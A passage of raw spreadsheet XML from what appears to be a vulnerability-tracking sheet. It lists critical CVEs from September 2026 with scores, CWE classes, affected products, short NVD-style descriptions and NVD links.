t="inlineStr" /><c r="J46" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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6" s="5" t="inlineStr" /><c r="M46" s="5" t="inlineStr" /><c r="N46" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O46" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P46" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q46" s="5" t="inlineStr" /><c r="R46" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S46" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Hyper-V allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T46" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69910</t></is></c></row><row r="47"><c r="A47" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B47" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C47" s="5" t="inlineStr"><is><t>CVE-2026-70296</t></is></c><c r="D47" s="5" t="n"><v>9.800000000000001</v></c><c r="E47" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F47" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G47" s="5" t="inlineStr" /><c r="H47" s="5" t="n"><v>0.01</v></c><c r="I47" s="5" t="inlineStr" /><c r="J47" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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 s="5" t="inlineStr" /><c r="M47" s="5" t="inlineStr" /><c r="N47" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O47" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P47" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q47" s="5" t="inlineStr" /><c r="R47" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S47" s="5" t="inlineStr"><is><t>Out-of-bounds write in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T47" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70296</t></is></c></row><row r="48"><c r="A48" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B48" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C48" s="5" t="inlineStr"><is><t>CVE-2026-71374</t></is></c><c r="D48" s="5" t="n"><v>9.800000000000001</v></c><c r="E48" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F48" s="5" t="inlineStr"><is><t>hirt@hitachi.co.jp</t></is></c><c r="G48" s="5" t="inlineStr" /><c r="H48" s="5" t="n"><v>0.003</v></c><c r="I48" s="5" t="inlineStr" /><c r="J48" s="5" t="inlineStr" /><c r="K48" s="5" t="inlineStr" /><c r="L48" s="5" t="inlineStr" /><c r="M48" s="5" t="inlineStr" /><c r="N48" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O48" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P48" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q48" s="5" t="inlineStr" /><c r="R48" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S48" s="5" t="inlineStr"><is><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48" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71374</t></is></c></row><row r="49"><c r="A49" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B49" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C49" s="5" t="inlineStr"><is><t>CVE-2026-71376</t></is></c><c r="D49" s="5" t="n"><v>9.800000000000001</v></c><c r="E49" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F49" s="5" t="inlineStr"><is><t>hirt@hitachi.co.jp</t></is></c><c r="G49" s="5" t="inlineStr" /><c r="H49" s="5" t="n"><v>0.01</v></c><c r="I49" s="5" t="inlineStr" /><c r="J49" s="5" t="inlineStr" /><c r="K49" s="5" t="inlineStr" /><c r="L49" s="5" t="inlineStr" /><c r="M49" s="5" t="inlineStr" /><c r="N49" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O49" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P49" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q49" s="5" t="inlineStr" /><c r="R49" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="S49" s="5" t="inlineStr"><is><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49" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71376</t></is></c></row><row r="50"><c r="A50" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B50" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C50" s="5" t="inlineStr"><is><t>CVE-2026-71377</t></is></c><c r="D50" s="5" t="n"><v>9.800000000000001</v></c><c r="E50" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F50" s="5" t="inlineStr"><is><t>hirt@hitachi.co.jp</t></is></c><c r="G50" s="5" t="inlineStr" /><c r="H50" s="5" t="n"><v>0.003</v></c><c r="I50" s="5" t="inlineStr" /><c r="J50" s="5" t="inlineStr" /><c r="K50" s="5" t="inlineStr" /><c r="L50" s="5" t="inlineStr" /><c r="M50" s="5" t="inlineStr" /><c r="N50" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O50" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P50" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q50" s="5" t="inlineStr" /><c r="R50" s="5" t="inlineStr"><is><t>CWE-88</t></is></c><c r="S50" s="5" t="inlineStr"><is><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is></c><c r="T50" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71377</t></is></c></row><row r="51"><c r="A51" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B51" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C51" s="5" t="inlineStr"><is><t>CVE-2026-72979</t></is></c><c r="D51" s="5" t="n"><v>9.800000000000001</v></c><c r="E51" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F51" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G51" s="5" t="inlineStr" /><c r="H51" s="5" t="n"><v>0.01</v></c><c r="I51" s="5" t="inlineStr" /><c r="J51" s="5" t="inlineStr" /><c r="K51" s="5" t="inlineStr" /><c r="L51" s="5" t="inlineStr" /><c r="M51" s="5" t="inlineStr" /><c r="N51" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O51" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P51" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q51" s="5" t="inlineStr" /><c r="R51" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S51" s="5" t="inlineStr"><is><t>Use after free in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T51" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72979</t></is></c></row><row r="52"><c r="A52" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B52" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C52" s="5" t="inlineStr"><is><t>CVE-2026-72982</t></is></c><c r="D52" s="5" t="n"><v>9.800000000000001</v></c><c r="E52" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F52" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G52" s="5" t="inlineStr" /><c r="H52" s="5" t="n"><v>0.008999999999999999</v></c><c r="I52" s="5" t="inlineStr" /><c r="J52" s="5" t="inlineStr" /><c r="K52" s="5" t="inlineStr" /><c r="L52" s="5" t="inlineStr" /><c r="M52" s="5" t="inlineStr" /><c r="N52" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O52" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P52" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q52" s="5" t="inlineStr" /><c r="R52" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S52" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Netlogon allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T52" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72982</t></is></c></row><row r="53"><c r="A53" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B53" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C53" s="5" t="inlineStr"><is><t>CVE-2026-72983</t></is></c><c r="D53" s="5" t="n"><v>9.800000000000001</v></c><c r="E53" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F53" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G53" s="5" t="inlineStr" /><c r="H53" s="5" t="n"><v>0.008999999999999999</v></c><c r="I53" s="5" t="inlineStr" /><c r="J53" s="5" t="inlineStr" /><c r="K53" s="5" t="inlineStr" /><c r="L53" s="5" t="inlineStr" /><c r="M53" s="5" t="inlineStr" /><c r="N53" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O53" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P53" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q53" s="5" t="inlineStr" /><c r="R53" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S53" s="5" t="inlineStr"><is><t>Use after free in Windows Internet Connection Sharing (ICS) allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T53" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72983</t></is></c></row><row r="54"><c r="A54" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B54" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C54" s="5" t="inlineStr"><is><t>CVE-2026-73009</t></is></c><c r="D54" s="5" t="n"><v>9.800000000000001</v></c><c r="E54" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F54" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G54" s="5" t="inlineStr" /><c r="H54" s="5" t="n"><v>0.008999999999999999</v></c><c r="I54" s="5" t="inlineStr" /><c r="J54" s="5" t="inlineStr" /><c r="K54" s="5" t="inlineStr" /><c r="L54" s="5" t="inlineStr" /><c r="M54" s="5" t="inlineStr" /><c r="N54" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O54" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P54" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q54" s="5" t="inlineStr" /><c r="R54" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S54" s="5" t="inlineStr"><is><t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T54" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73009</t></is></c></row><row r="55"><c r="A55" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B55" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C55" s="5" t="inlineStr"><is><t>CVE-2026-73010</t></is></c><c r="D55" s="5" t="n"><v>9.800000000000001</v></c><c r="E55" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F55" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G55" s="5" t="inlineStr" /><c r="H55" s="5" t="n"><v>0.008999999999999999</v></c><c r="I55" s="5" t="inlineStr" /><c r="J55" s="5" t="inlineStr" /><c r="K55" s="5" t="inlineStr" /><c r="L55" s="5" t="inlineStr" /><c r="M55" s="5" t="inlineStr" /><c r="N55" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O55" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P55" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q55" s="5" t="inlineStr" /><c r="R55" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S55" s="5" t="inlineStr"><is><t>Use after free in Windows Failover Cluster allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T55" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73010</t></is></c></row><row r="56"><c r="A56" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B56" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C56" s="5" t="inlineStr"><is><t>CVE-2026-73025</t></is></c><c r="D56" s="5" t="n"><v>9.800000000000001</v></c><c r="E56" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F56" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G56" s="5" t="inlineStr" /><c r="H56" s="5" t="n"><v>0.008999999999999999</v></c><c r="I56" s="5" t="inlineStr" /><c r="J56" s="5" t="inlineStr" /><c r="K56" s="5" t="inlineStr" /><c r="L56" s="5" t="inlineStr" /><c r="M56" s="5" t="inlineStr" /><c r="N56" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O56" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P56" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q56" s="5" t="inlineStr" /><c r="R56" s="5" t="inlineStr"><is><t>CWE-1390</t></is></c><c r="S56" s="5" t="inlineStr"><is><t>Weak authentication in Windows iSCSI allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T56" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73025</t></is></c></row><row r="57"><c r="A57" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B57" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C57" s="5" t="inlineStr"><is><t>CVE-2026-77089</t></is></c><c r="D57" s="5" t="n"><v>9.800000000000001</v></c><c r="E57" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F57" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G57" s="5" t="inlineStr" /><c r="H57" s="5" t="n"><v>0.003</v></c><c r="I57" s="5" t="inlineStr" /><c r="J57" s="5" t="inlineStr" /><c r="K57" s="5" t="inlineStr"><is><t>commvault:commvault</t></is></c><c r="L57" s="5" t="inlineStr" /><c r="M57" s="5" t="inlineStr" /><c r="N57" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O57" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P57" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q57" s="5" t="inlineStr" /><c r="R57" s="5" t="inlineStr"><is><t>CWE-290</t></is></c><c r="S57" s="5" t="inlineStr"><is><t>Command Center API contained an authentication bypass issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update Command Center.</t></is></c><c r="T57" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77089</t></is></c></row><row r="58"><c r="A58" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B58" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C58" s="5" t="inlineStr"><is><t>CVE-2026-77092</t></is></c><c r="D58" s="5" t="n"><v>9.800000000000001</v></c><c r="E58" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F58" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G58" s="5" t="inlineStr" /><c r="H58" s="5" t="n"><v>0.002</v></c><c r="I58" s="5" t="inlineStr" /><c r="J58" s="5" t="inlineStr" /><c r="K58" s="5" t="inlineStr"><is><t>commvault:commvault</t></is></c><c r="L58" s="5" t="inlineStr" /><c r="M58" s="5" t="inlineStr" /><c r="N58" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O58" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P58" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q58" s="5" t="inlineStr" /><c r="R58" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S58" s="5" t="inlineStr"><is><t>Content Extractor contained a deserialization of untrusted data issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update Content Extractor.</t></is></c><c r="T58" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77092</t></is></c></row><row r="59"><c r="A59" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B59" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C59" s="5" t="inlineStr"><is><t>CVE-2026-77098</t></is></c><c r="D59" s="5" t="n"><v>9.800000000000001</v></c><c r="E59" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F59" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G59" s="5" t="inlineStr" /><c r="H59" s="5" t="n"><v>0.003</v></c><c r="I59" s="5" t="inlineStr" /><c r="J59" s="5" t="inlineStr" /><c r="K59" s="5" t="inlineStr"><is><t>commvault:commvault</t></is></c><c r="L59" s="5" t="inlineStr" /><c r="M59" s="5" t="inlineStr" /><c r="N59" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O59" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P59" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q59" s="5" t="inlineStr" /><c r="R59" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S59" s="5" t="inlineStr"><is><t>Private Metrics Server contained an SQL injection condition affecting database operations. Software customers upgrade to resolved maintenance release. Update Private Metrics Server.</t></is></c><c r="T59" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77098</t></is></c></row><row r="60"><c r="A60" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B60" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C60" s="5" t="inlineStr"><is><t>CVE-2026-77493</t></is></c><c r="D60" s="5" t="n"><v>9.800000000000001</v></c><c r="E60" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F60" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G60" s="5" t="inlineStr" /><c r="H60" s="5" t="n"><v>0.01</v></c><c r="I60" s="5" t="inlineStr" /><c r="J60" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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0" s="5" t="inlineStr" /><c r="M60" s="5" t="inlineStr" /><c r="N60" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O60" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P60" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q60" s="5" t="inlineStr" /><c r="R60" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S60" s="5" t="inlineStr"><is><t>Double free in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T60" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77493</t></is></c></row><row r="61"><c r="A61" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B61" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C61" s="5" t="inlineStr"><is><t>CVE-2026-78445</t></is></c><c r="D61" s="5" t="n"><v>9.800000000000001</v></c><c r="E61" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F61" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G61" s="5" t="inlineStr" /><c r="H61" s="5" t="n"><v>0.008999999999999999</v></c><c r="I61" s="5" t="inlineStr" /><c r="J61" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K61" s="5" t="inlineStr"><is><t>microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L61" s="5" t="inlineStr" /><c r="M61" s="5" t="inlineStr" /><c r="N61" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O61" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P61" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q61" s="5" t="inlineStr" /><c r="R61" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S61" s="5" t="inlineStr"><is><t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T61" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78445</t></is></c></row><row r="62"><c r="A62" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B62" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C62" s="5" t="inlineStr"><is><t>CVE-2026-78509</t></is></c><c r="D62" s="5" t="n"><v>9.800000000000001</v></c><c r="E62" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F62" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G62" s="5" t="inlineStr" /><c r="H62" s="5" t="n"><v>0.01</v></c><c r="I62" s="5" t="inlineStr" /><c r="J62" s="5" t="inlineStr" /><c r="K62" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L62" s="5" t="inlineStr" /><c r="M62" s="5" t="inlineStr" /><c r="N62" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O62" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P62" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q62" s="5" t="inlineStr" /><c r="R62" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S62" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T62" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78509</t></is></c></row><row r="63"><c r="A63" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B63" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C63" s="5" t="inlineStr"><is><t>CVE-2026-78510</t></is></c><c r="D63" s="5" t="n"><v>9.800000000000001</v></c><c r="E63" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F63" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G63" s="5" t="inlineStr" /><c r="H63" s="5" t="n"><v>0.01</v></c><c r="I63" s="5" t="inlineStr" /><c r="J63" s="5" t="inlineStr" /><c r="K63" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L63" s="5" t="inlineStr" /><c r="M63" s="5" t="inlineStr" /><c r="N63" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O63" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P63" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q63" s="5" t="inlineStr" /><c r="R63" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S63" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T63" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78510</t></is></c></row><row r="64"><c r="A64" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B64" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C64" s="5" t="inlineStr"><is><t>CVE-2026-79569</t></is></c><c r="D64" s="5" t="n"><v>9.800000000000001</v></c><c r="E64" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F64" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G64" s="5" t="inlineStr" /><c r="H64" s="5" t="n"><v>0.004</v></c><c r="I64" s="5" t="inlineStr" /><c r="J64" s="5" t="inlineStr" /><c r="K64" s="5" t="inlineStr" /><c r="L64" s="5" t="inlineStr" /><c r="M64" s="5" t="inlineStr" /><c r="N64" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O64" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P64" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q64" s="5" t="inlineStr" /><c r="R64" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S64" s="5" t="inlineStr"><is><t>Movie_Recommend v1.0.0 was discovered to contain a SQL injection vulnerability in the sort parameter at /loadingmore. This vulnerability allows attackers to access sensitive database information via a crafted SQL statement.</t></is></c><c r="T64" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79569</t></is></c></row><row r="65"><c r="A65" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B65" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C65" s="5" t="inlineStr"><is><t>CVE-2026-79570</t></is></c><c r="D65" s="5" t="n"><v>9.800000000000001</v></c><c r="E65" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F65" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G65" s="5" t="inlineStr" /><c r="H65" s="5" t="n"><v>0.003</v></c><c r="I65" s="5" t="inlineStr" /><c r="J65" s="5" t="inlineStr" /><c r="K65" s="5" t="inlineStr" /><c r="L65" s="5" t="inlineStr" /><c r="M65" s="5" t="inlineStr" /><c r="N65" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O65" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P65" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q65" s="5" t="inlineStr" /><c r="R65" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S65" s="5" t="inlineStr"><is><t>mfish-nocode-pro v1.0.0 was discovered to contain a SQL injection vulnerability in the tableName parameter at /sys/dbConnect/data. This vulnerability allows attackers to access sensitive database information via a crafted SQL statement.</t></is></c><c r="T65" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79570</t></is></c></row><row r="66"><c r="A66" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B66" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C66" s="5" t="inlineStr"><is><t>CVE-2026-79574</t></is></c><c r="D66" s="5" t="n"><v>9.800000000000001</v></c><c r="E66" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F66" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G66" s="5" t="inlineStr" /><c r="H66" s="5" t="n"><v>0.005</v></c><c r="I66" s="5" t="inlineStr" /><c r="J66" s="5" t="inlineStr" /><c r="K66" s="5" t="inlineStr" /><c r="L66" s="5" t="inlineStr" /><c r="M66" s="5" t="inlineStr" /><c r="N66" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O66" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P66" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q66" s="5" t="inlineStr" /><c r="R66" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S66" s="5" t="inlineStr"><is><t>An issue in the gateway server of mpush v0.8.1 allows attackers to execute arbitrary code via sending a crafted broadcast message.</t></is></c><c r="T66" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79574</t></is></c></row><row r="67"><c r="A67" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B67" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C67" s="5" t="inlineStr"><is><t>CVE-2026-79576</t></is></c><c r="D67" s="5" t="n"><v>9.800000000000001</v></c><c r="E67" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F67" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G67" s="5" t="inlineStr" /><c r="H67" s="5" t="n"><v>0.003</v></c><c r="I67" s="5" t="inlineStr" /><c r="J67" s="5" t="inlineStr" /><c r="K67" s="5" t="inlineStr" /><c r="L67" s="5" t="inlineStr" /><c r="M67" s="5" t="inlineStr" /><c r="N67" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O67" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P67" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q67" s="5" t="inlineStr" /><c r="R67" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S67" s="5" t="inlineStr"><is><t>An issue in the Single-Sign On (SSO) component of Digital-Infrastructure v9.6.7 allows attackers to authenticate as any user, including the Admin, without a password.</t></is></c><c r="T67" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79576</t></is></c></row><row r="68"><c r="A68" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B68" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C68" s="5" t="inlineStr"><is><t>CVE-2026-79577</t></is></c><c r="D68" s="5" t="n"><v>9.800000000000001</v></c><c r="E68" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F68" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G68" s="5" t="inlineStr" /><c r="H68" s="5" t="n"><v>0.003</v></c><c r="I68" s="5" t="inlineStr" /><c r="J68" s="5" t="inlineStr" /><c r="K68" s="5" t="inlineStr" /><c r="L68" s="5" t="inlineStr" /><c r="M68" s="5" t="inlineStr" /><c r="N68" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O68" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P68" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q68" s="5" t="inlineStr" /><c r="R68" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S68" s="5" t="inlineStr"><is><t>An issue in the /cas/login component of 